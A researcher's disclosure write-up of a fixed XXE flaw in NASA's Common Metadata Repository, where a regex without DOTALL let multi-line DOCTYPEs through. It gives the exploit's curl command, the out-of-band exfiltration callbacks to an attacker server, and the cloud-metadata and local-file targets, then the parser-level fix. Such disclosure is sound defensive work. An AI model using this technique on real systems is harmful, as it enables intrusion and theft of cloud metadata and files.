The Regex Said Safe. The Parser Disagreed. NASA's Earth Science Platform Had a Critical Vulnerability

A sanitizer understood text. A parser understood XML grammar. The gap became a CVSS 9.1 bug in NASA Earth science infrastructure.

Dewank Pant

May 18, 2026

Every parser has an opinion about what input means. Every filter has a different opinion. When those two opinions diverge, the filter thinks it won and the parser keeps going. That gap is where vulnerabilities live, not in missing security controls, but in the disagreement between the ones that exist.

In early 2026, I identified a critical XML External Entity injection vulnerability in NASA's Common Metadata Repository, commonly known as CMR. CMR is one of the quiet but essential systems behind NASA Earthdata, the public gateway used by researchers, government agencies, universities, disaster response teams, and Earth observation programs to discover and access NASA's Earth science datasets. In other words, this was not a bug in a forgotten side project. It was a vulnerability in infrastructure that supports real scientific and operational work.

The affected functionality was an XML-based AQL search endpoint. The application attempted to prevent XXE by removing DOCTYPE declarations before parsing XML. The idea was straightforward: strip the dangerous XML construct before the parser sees it.

The implementation came down to this pattern:

#"<!DOCTYPE.*?>"

At first glance, that looks like it should remove a DOCTYPE declaration. But in Java regular expressions, the . metacharacter does not match newline characters by default. A single-line DOCTYPE was removed. A multi-line DOCTYPE was not!

That one difference was enough to bypass the sanitizer, reach the XML parser, and trigger external entity resolution.

From there, the vulnerability enabled server-side request forgery from NASA production infrastructure, out-of-band metadata exposure, internal service enumeration through timing and response behavior, blind file system probing, and denial-of-service impact.

The report was triaged as P1, assigned CVSS 9.1 Critical, fixed by NASA, and later publicly disclosed through Bugcrowd.

The system behind the vulnerability

NASA's Common Metadata Repository is part of the catalog infrastructure behind Earthdata, which researchers use to discover and access NASA Earth science data. That ecosystem supports climate research, disaster response, agriculture, environmental monitoring, public policy, scientific journalism, and commercial Earth observation workflows.

That context matters because a vulnerability in this kind of system is not only about one endpoint accepting malformed XML. It is about a public-facing platform that sits near data discovery workflows used by researchers, agencies, and organizations around the world.

The vulnerable path was not a new feature. It was not an authentication flow, a modern API gateway issue, or a complex business logic flaw. It was a legacy XML search interface.

Those paths are often worth reviewing because they tend to survive for compatibility reasons. They may not change often, but they remain reachable. Over time, old assumptions inside those paths can become security boundaries without anyone realizing it.

That is exactly what happened here!

The affected code path

The NASA Common Metadata Repository is open source. While working out how the AQL search functionality behaved, I traced the parsing call path in search-app/src/cmr/search/services/aql/conversion.clj and found that user-supplied XML was passed through a sanitization function before being handed to the XML parser. The flaw became apparent when I reviewed that sanitization function directly in common-lib/src/cmr/common/xml.clj. The regex pattern looked correct at a glance. Seeing why it was not required knowing how Java regex handles newlines, and recognizing that the parser would not share the regex's blind spot.

The vulnerable functionality accepted XML input for an AQL search request. No authentication was required. The endpoint was publicly accessible.

POST /search/concepts/search
Content-Type: application/xml

The sanitization function removed XML processing instructions and DOCTYPE declarations using regular expressions. The relevant Clojure helper function looked like this:

(defn remove-xml-processing-instructions
  [xml]
  (let [processing-regex #"<\?.*?\?>"
        doctype-regex #"<!DOCTYPE.*?>"]
    (-> xml
        (string/replace processing-regex "")
        (string/replace doctype-regex ""))))

The intent was clear: remove XML processing instructions, remove DOCTYPE, and then parse the remaining XML. Looks safe, right? Right?

The problem was that the security boundary depended on whether the regex could recognize every dangerous form of DOCTYPE.

It could not!

The root cause

The vulnerable pattern was:

doctype-regex #"<!DOCTYPE.*?>"

In Java regex, . does not match newline characters unless dotall mode is enabled. That means the pattern can match a DOCTYPE declaration when it appears on one line, such as:

<!DOCTYPE root [ ... ]>

But it does not match the same declaration when it is split across lines, such as:

<!DOCTYPE
root [ ... ]>

The sanitizer and the XML parser disagreed about the same input. The sanitizer failed to recognize it as a complete DOCTYPE, while the XML parser accepted it as valid XML grammar.

That mismatch created the bypass.
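The disagreement is easy to reproduce outside CMR. Clojure regex literals compile to java.util.regex.Pattern, so the sketch below uses plain Java with the same pattern text. The class name, the helper, and the sample strings are illustrative assumptions, and the DOCTYPE bodies are harmless placeholders rather than the payload used in testing.

```java
import java.util.regex.Pattern;

public class DoctypeRegexDemo {
    // Same pattern text as the Clojure literal #"<!DOCTYPE.*?>".
    // No flags are set, so '.' does not match line terminators.
    static final Pattern DOCTYPE = Pattern.compile("<!DOCTYPE.*?>");

    // Hypothetical stand-in for the DOCTYPE half of the sanitizer.
    static String strip(String xml) {
        return DOCTYPE.matcher(xml).replaceAll("");
    }

    public static void main(String[] args) {
        String singleLine = "<!DOCTYPE root [ ]><root/>";
        String multiLine = "<!DOCTYPE\nroot [ ]><root/>";

        // The one-line declaration is removed.
        System.out.println(strip(singleLine));
        // The declaration split across lines comes back unchanged.
        System.out.println(strip(multiLine).equals(multiLine));
    }
}
```

The first call prints <root/>. The second prints true: the multi-line input passes through the filter untouched and reaches the parser with its DOCTYPE intact.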

Once the multi-line DOCTYPE reached the parser, external entity definitions could be processed. At that point, the attacker was no longer just influencing XML structure. The attacker could cause the server to resolve external resources.

That turns XXE into SSRF. In a cloud environment, that can quickly become serious.

Why regex-based XML sanitization failed

XML is not a simple string format. It has grammar, declarations, entities, parameter entities, DTDs, external references, encodings, and parser-specific behavior. A regex may catch one representation of a dangerous construct while missing another representation that the parser still accepts.

The vulnerable logic attempted to remove dangerous XML before parsing. But the parser was still configured in a way that allowed external entity processing if a declaration survived the filter.

That is the core issue.

The application tried to make XML safe by rewriting the input string. A safer model is to harden the parser itself so dangerous XML features cannot execute even if they reach the parser.

In this case, the missed case was only a newline.

Attack flow

The exploit chain had three main stages:

1. Bypass the XML sanitizer.
2. Reach the XML parser with a valid DOCTYPE.
3. Use external entity resolution to make the server interact with resources it should not touch.

The AQL endpoint accepted XML at POST /search/concepts/search with Content-Type: application/xml. No authentication was required.

The bypass worked because the regex #"<!DOCTYPE.*?>" cannot cross newline boundaries. The closing > of a DOCTYPE block that spans multiple lines is never reached by the pattern. The parser, however, accepted the full block as valid XML grammar.

The production payload that confirmed the bypass:

[Image: production payload fetching the external DTD]

The DOCTYPE keyword opens on one line, the ]> closes it on a later line. The regex cannot span that gap. The parser does not care about the gap at all.

The external DTD served from the attacker-controlled server contained the entity chain that drove data exfiltration:

[Image: external DTD with the actual attack and exfiltration chain]

The server made two sequential outbound requests for every exfiltration test: first to fetch the DTD, then to deliver the file content as a URL parameter to the callback endpoint.

The production curl that triggered this:

curl -v -H "Content-Type: application/xml" \
  --data-binary @malicious-aql.xml \
  https://cmr.earthdata.nasa.gov/search/concepts/search

The simplified flow was:

1. Send XML to the public AQL search endpoint.
2. Use a multi-line DOCTYPE to bypass regex-based sanitization.
3. Define an external parameter entity referencing an attacker-controlled DTD.
4. Cause the XML parser to fetch the external DTD during parsing.
5. Observe the outbound callback from NASA production infrastructure.
6. Use the DTD to define a second entity that reads a local resource and delivers its contents as a URL parameter to a callback endpoint.
7. Measure callbacks, response codes, and timing to validate impact.

This is why XXE bugs are often more serious than they first appear. The original input is just XML, but once external entity resolution is enabled, the parser becomes a network-capable component that makes requests from inside the target environment.

That is what turns XXE into SSRF.

Why the external DTD mattered

The external DTD was the mechanism that made full out-of-band data exfiltration possible.

The XML specification restricts parameter entities inside the internal DTD subset: a parameter entity reference may not appear within a markup declaration there. In an external DTD, that restriction does not apply. Parameter entities defined in an external DTD can reference files, read their contents, and embed those contents into a second outbound request, all during a single XML parse operation.

The pattern works in two steps. The first entity reads a local resource. The second entity constructs a URL containing the content of the first entity as a query parameter, then causes the parser to fetch that URL. The attacker sees the file content arrive as a request to a server they control.

For file:///etc/hostname, the server made this request to the callback endpoint:

GET /hostname?data=[internal-ec2-hostname].ec2.internal HTTP/1.1
Host: [attacker-server]

For the ECS metadata endpoint at http://169.254.170.2/v2/metadata, the same mechanism delivered the full container metadata JSON as a URL parameter.

This technique is called out-of-band XXE because the sensitive data does not appear in the HTTP response from the vulnerable application. It appears in a separate inbound request to the attacker's server. That makes it effective even when the vulnerable endpoint returns no useful output in its normal response body.

Confirmed impact

I kept testing within the boundaries of NASA's Vulnerability Disclosure Program. The goal was to demonstrate severity clearly without turning validation into uncontrolled exploitation.

Within those limits, I confirmed multiple impact paths across five test cases, all against the production endpoint unless noted.

1. Server-side request forgery from production

The first confirmed impact was SSRF.

After the multi-line DOCTYPE bypassed sanitization, the parser fetched the external DTD from an attacker-controlled server. That confirmed that cmr.earthdata.nasa.gov was initiating outbound HTTP connections based on attacker-supplied XML input.

The callback server received:

GET /test.dtd HTTP/1.1
Host: [attacker-server]

from a NASA production IP address. The request was not from a browser or a test client. It was from the CMR application server itself, mid-parse.

SSRF matters because the attacker does not need direct network access to internal infrastructure. They can influence a trusted server to make requests on their behalf, from its own network position, with its own outbound access rights.

2. Out-of-band environment and cloud metadata exposure

Using the external DTD mechanism, data was exfiltrated out-of-band from the production environment across five separate tests. All of the following was extracted from cmr.earthdata.nasa.gov in production.

Internal hostname (file:///etc/hostname):

GET /hostname?data=[internal-hostname].ec2.internal

Kernel version (file:///proc/sys/kernel/osrelease):

GET /os?data=5.10.24xxxxxxx-xxxxxxxx-xxxxxxxx

The kernel version identified the host as Amazon Linux 2.

Second internal hostname (file:///proc/sys/kernel/hostname):

GET /kernel-host?data=[second-internal-hostname].ec2.internal

ECS container metadata (http://169.254.170.2/v2/metadata):

{
  "Cluster": "arn:aws:ecs:us-east-1:[account-id]:cluster/cmr-service-prod",
  "TaskARN": "arn:aws:ecs:us-east-1:[account-id]:task/cmr-service-prod/[task-id]",
  "Family": "search-prod",
  "Revision": "377",
  "DesiredStatus": "RUNNING",
  "KnownStatus": "RUNNING",
  "Containers": [{
    "DockerId": "[container-id]",
    "Name": "app",
    "Image": "[account-id].dkr.ecr.us-east-1.amazonaws.com/xxxxxxxxxx-xxxx-xxxxxxx",
    "Networks": [{
      "NetworkMode": "awsvpc",
      "IPv4Addresses": ["[internal-ip]"]
    }],
    "AvailabilityZone": "us-east-1b"
  }]
}

That single response exposed the AWS account ID, ECS cluster name and ARN, task ARN, container ID, ECR image URI with build tag, internal IP address, and availability zone, all from a public XML endpoint requiring no authentication.

Container resource statistics (http://169.254.170.2/v2/stats):

{
  "cpu_stats": {
    "cpu_usage": {
      "total_usage": 16343630449797,
      "percpu_usage": [8066247746107, 8281152982395],
      "usage_in_kernelmode": 551100000000,
      "usage_in_usermode": 15757270000000,
      "online_cpus": 2
    }
  },
  "memory_stats": {
    "usage": 1281866547,
    "max_usage": 1282063974,
    "stats": {
      "cache": 17301504,
      "hierarchical_memory_limit": 13958643712,
      "rss": 1276959129
    }
  }
}

Some people underestimate metadata exposure because it does not look like a password. That is the wrong way to think about it.

Infrastructure metadata tells an attacker exactly where they are. The account ID anchors further IAM enumeration. The cluster and task ARNs map the ECS topology. The ECR image URI reveals the build pipeline naming convention and container version. The internal IP anchors network reconnaissance. The availability zone narrows the deployment footprint.
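To make that concrete, an ARN is a colon-delimited string whose fields are documented by AWS: arn, partition, service, region, account ID, and resource. The sketch below splits one apart. The class and method names are hypothetical, and the account ID is the 123456789012 placeholder used in AWS documentation, not the redacted value from the response above.

```java
import java.util.LinkedHashMap;
import java.util.Map;

public class ArnFields {
    // Splits an ARN of the form arn:partition:service:region:account-id:resource.
    // The limit of 6 keeps any ':' inside the resource part intact.
    static Map<String, String> parse(String arn) {
        String[] parts = arn.split(":", 6);
        if (parts.length != 6 || !parts[0].equals("arn")) {
            throw new IllegalArgumentException("not an ARN: " + arn);
        }
        Map<String, String> fields = new LinkedHashMap<>();
        fields.put("partition", parts[1]);
        fields.put("service", parts[2]);
        fields.put("region", parts[3]);
        fields.put("accountId", parts[4]);
        fields.put("resource", parts[5]);
        return fields;
    }

    public static void main(String[] args) {
        // Placeholder account ID; the cluster name matches the redacted response.
        String arn = "arn:aws:ecs:us-east-1:123456789012:cluster/cmr-service-prod";
        parse(arn).forEach((name, value) -> System.out.println(name + " = " + value));
    }
}
```

One leaked string yields the service in use, the region, the account, and the resource naming scheme, which is why a single metadata response goes a long way.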

Cloud attacks are built in stages. First, the attacker proves a primitive. Then they map the environment. Metadata is what turns a blind outbound callback into a usable map.

3. Internal service enumeration

The SSRF primitive also allowed internal service enumeration through HTTP response code differentials, confirmed on a local instance running the identical open-source codebase to avoid unauthorized production reconnaissance.

The CMR application returned different status codes depending on whether an internal service was reachable. Port 3001, where the Metadata DB service runs, returned HTTP 200 when targeted. Port 9999, which was closed, returned HTTP 500. The difference was consistent and repeatable.

Beyond response codes, connection behavior provided a timing oracle with the following measured characteristics:

Open port:          1-5 seconds    (connection succeeded)
Closed port:        10-20 seconds  (connection refused immediately)
Filtered/timeout:   75+ seconds    (java.net.ConnectException, Duration: 75036ms)

The 75-second timeout was observed directly in CMR logs. An attacker probing the internal network could distinguish open, closed, and firewalled hosts using timing alone, without ever seeing a response body.

Before an attacker can exploit an internal service, they need to know it exists. This oracle provides that.
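As a rough illustration of how little information the oracle needs, the measured bands can be turned into a lookup. This is a sketch only: the class, enum, and method names are hypothetical, the thresholds are copied from the three ranges listed above, and anything falling between those ranges is reported as unknown rather than guessed.

```java
public class TimingOracle {
    enum PortState { OPEN, CLOSED, FILTERED, UNKNOWN }

    // Maps an observed request duration to the bands measured on the local instance.
    // Durations outside the three observed bands are left unclassified.
    static PortState classify(long elapsedMillis) {
        if (elapsedMillis >= 1_000 && elapsedMillis <= 5_000) {
            return PortState.OPEN;      // 1-5 seconds
        }
        if (elapsedMillis >= 10_000 && elapsedMillis <= 20_000) {
            return PortState.CLOSED;    // 10-20 seconds
        }
        if (elapsedMillis >= 75_000) {
            return PortState.FILTERED;  // 75+ seconds, e.g. the logged 75036ms
        }
        return PortState.UNKNOWN;
    }

    public static void main(String[] args) {
        System.out.println(classify(3_000));
        System.out.println(classify(15_000));
        System.out.println(classify(75_036));
        System.out.println(classify(40_000));
    }
}
```

No response body is involved at any point. The only input is how long the request took.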

4. Blind file system probing

The XXE primitive also enabled blind file system probing, confirmed against the production endpoint.

Targeting file:///etc/passwd returned HTTP 200 and resolved in approximately 20ms. Targeting file:///etc/nonexistent-file-12345 returned HTTP 500. The behavioral difference was consistent enough to treat as a reliable oracle.

On production, file:///etc/hostname and file:///proc/sys/kernel/osrelease were confirmed readable, with their contents exfiltrated out-of-band as shown in the metadata section above.

An attacker using this oracle could enumerate sensitive paths, including /proc/self/environ, credential files, SSH keys, and application configuration, without those files ever appearing in an HTTP response. The contents of any file confirmed to exist could then be exfiltrated with the out-of-band technique described earlier.

5. Denial-of-service behavior

External entity resolution also introduced denial-of-service risk, demonstrated on a local instance to avoid impacting production availability.

CMR logs showed that connection attempts to unreachable hosts caused a 75-second timeout per entity reference, confirmed by the logged exception:

java.net.ConnectException: Operation timed out
Duration: 75036ms

A test payload referenced three external entities, each targeting an unreachable host. Total request time exceeded 225 seconds, three consecutive timeouts of roughly 75 seconds each. Worker threads remained blocked for the full duration of each timeout. A small number of concurrent requests using this pattern could exhaust the thread pool and degrade availability for legitimate users.
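The arithmetic behind that figure is simple multiplication, sketched here with the logged 75036ms duration. The class and method names are hypothetical, and the calculation assumes the parser resolves the entities one after another, which is what the observed total suggests.

```java
public class TimeoutMath {
    // Duration of one failed connection attempt, taken from the logged exception.
    static final long LOGGED_TIMEOUT_MS = 75_036;

    // Time one worker thread stays blocked if each unreachable entity
    // is resolved sequentially and waits out the full timeout.
    static long blockedMillis(int unreachableEntities, long timeoutMs) {
        return unreachableEntities * timeoutMs;
    }

    public static void main(String[] args) {
        long total = blockedMillis(3, LOGGED_TIMEOUT_MS);
        System.out.println(total + " ms");
    }
}
```

Three entities give 225108 ms, just over 225 seconds, for a single request. Every additional entity reference adds another timeout to the time that worker stays unavailable.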

An XML parser that can fetch external resources is not just parsing input. It is performing attacker-influenced I/O. That can affect confidentiality through data exposure and availability through resource exhaustion simultaneously.

Why the severity was critical

The final rating was CVSS 9.1 Critical with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L.

That rating was justified because the vulnerability combined the following confirmed properties:

Publicly reachable endpoint
No authentication required
User-controlled XML input reaching the parser
Bypassable DOCTYPE sanitization
External entity processing enabled after bypass
Confirmed SSRF from production infrastructure
Confirmed out-of-band data exfiltration from production
AWS account and ECS metadata exposed
Internal service enumeration via response code oracle
Blind file system probing via response differential
Denial-of-service via timeout multiplication

The exploit path did not depend on guessing credentials, winning a race condition, or any user interaction. The vulnerable behavior was reachable through crafted XML input sent to a public endpoint.

What I did not do

Responsible validation is different from uncontrolled exploitation.

I did not attempt to retrieve AWS IAM credentials via the EC2 metadata service at 169.254.169.254. I did not attempt to pivot deeper into NASA's environment using the confirmed metadata. I did not modify data, access scientific datasets, or attempt persistence. I did not test beyond what was necessary to prove impact at each stage.

The confirmed primitives were already sufficient to establish critical severity. The metadata exfiltration demonstrated that the vulnerability was real and the impact was material. Further exploitation was unnecessary and would have crossed the line from validation into intrusion.

The fix

The narrow fix is a one-flag change in one file.

Vulnerable
(def doctype-regex #"<!DOCTYPE.*?>")

Fixed
(def doctype-regex #"(?s)<!DOCTYPE.*?>")

The (?s) flag enables DOTALL mode in Java regex, causing . to match newline characters. A multi-line DOCTYPE is no longer invisible to the pattern.
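The effect of the flag can be checked with a plain-Java sketch, using hypothetical names and placeholder inputs. It also shows a limitation of the pattern itself: the lazy .*? stops at the first >, so a DOCTYPE with an internal subset is only partly removed.

```java
import java.util.regex.Pattern;

public class DoctypeRegexFixed {
    // (?s) turns on DOTALL, so '.' also matches line terminators.
    static final Pattern DOCTYPE = Pattern.compile("(?s)<!DOCTYPE.*?>");

    static String strip(String xml) {
        return DOCTYPE.matcher(xml).replaceAll("");
    }

    public static void main(String[] args) {
        // A multi-line DOCTYPE with no '>' inside it is now removed.
        String multiLine = "<!DOCTYPE\nroot [ ]><root/>";
        System.out.println(strip(multiLine));

        // With an internal subset, the match ends at the first '>' (the end
        // of the ELEMENT declaration), leaving the closing "]>" behind.
        String withSubset = "<!DOCTYPE\nroot [\n<!ELEMENT root ANY>\n]>\n<root/>";
        System.out.println(strip(withSubset).contains("]>"));
    }
}
```

The first line printed is <root/>, the second is true. The leftover ]> is no longer a DOCTYPE, so a conforming parser should reject the document rather than resolve entities from it, but the input has been mangled rather than cleanly sanitized.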

But that is not the fix I would rely on as the primary defense.

The correct fix is at the parser level. In search-app/src/cmr/search/services/aql/conversion.clj at line 367, the call to clojure.data.xml/parse-str should be replaced with the secure SAX parser already present in the CMR codebase:

Vulnerable
xml-struct (xml/parse-str (cx/remove-xml-processing-instructions aql))

Fixed
xml-struct (xml/parse-str-sax-no-xxe (cx/remove-xml-processing-instructions aql))

That disables external entity processing at the parser level regardless of what the input looks like. The regex can still run as defense-in-depth. But the parser should never have been in a state where bypassing a regex was sufficient to reach external entity resolution.

Because that secure parser already existed, the fix was a matter of applying it to the AQL parsing path. More generally, the defensive posture should be:

Disable DOCTYPE declarations at the parser level.
Disable external general entities.
Disable external parameter entities.
Disable external DTD loading.
Disable network access during XML parsing.
Treat string sanitization as defense-in-depth, not as the primary control.
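In JAXP terms, that checklist maps roughly onto the factory settings below. This is a generic sketch using the JDK's built-in DOM parser, not the body of CMR's parse-str-sax-no-xxe, which is not reproduced here. The class and method names are hypothetical, and the feature URIs are the Xerces ones the JDK parser recognizes; other parser implementations may need different keys.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

public class HardenedXml {
    static DocumentBuilder newHardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Reject any document that contains a DOCTYPE declaration.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Belt and braces in case DOCTYPE is ever re-enabled.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        // An empty protocol list means no external DTD or schema may be fetched.
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Returns true if the hardened parser accepts the document, false if it rejects it.
    static boolean parses(String xml) {
        try {
            newHardenedBuilder().parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return true;
        } catch (SAXException rejected) {
            return false;
        } catch (IOException | ParserConfigurationException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        // Harmless multi-line DOCTYPE with an internal entity only; no network access.
        String withDoctype = "<!DOCTYPE\nroot [ <!ENTITY e \"x\"> ]>\n<root>&e;</root>";
        System.out.println(parses(withDoctype));
        System.out.println(parses("<root/>"));
    }
}
```

With these settings the parser refuses the document as soon as it sees a DOCTYPE, on one line or many, so it no longer matters whether a string filter upstream recognized it.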

A regex should not be the thing standing between the open internet and a parser that can make network requests.

Remediation timeline

I reported the vulnerability through NASA's Vulnerability Disclosure Program on Bugcrowd on February 2, 2026. Bugcrowd validated the SSRF callback the same day and moved the submission to triaged on February 5. NASA confirmed and accepted the finding. I provided reproduction steps and the out-of-band exfiltration proof of concept on February 5. The submission was marked resolved on March 3, 2026. NASA issued a formal Letter of Recognition from the SAISO on March 11, 2026. The public disclosure was published to Bugcrowd CrowdStream on March 17, 2026.

The fix was merged to the public NASA Common Metadata Repository via pull request #2378.

The full public disclosure is available on Bugcrowd CrowdStream.

The process worked the way coordinated vulnerability disclosure is supposed to work: report, validation, remediation, resolution, and public disclosure after the issue was fixed.

Why this bug matters

The important part of this vulnerability is not just that XXE still exists. Security engineers already know that unsafe XML parsing is dangerous.

The more interesting lesson is that the application appeared to have a protection in place. There was a sanitization function. There was an attempt to remove DOCTYPE. There was visible security intent.

But the control was implemented at the wrong layer.

The application tried to secure XML by rewriting the input string before parsing it. The regex understood text. The XML parser understood XML grammar. Those two interpretations were not equivalent, and the gap between them became the vulnerability.

This pattern shows up in many places beyond XML. Any time an application tries to secure a structured language by rewriting strings before handing the result to a real parser, there is a chance that the filter and the parser will disagree. That disagreement is where bypasses live.

For XML specifically, the safest approach is not to guess every dangerous representation of DOCTYPE. The safer approach is to configure the parser so external entity resolution is not available in the first place.

In this case, one regular expression looked like a protection.

One newline proved it was not enough!

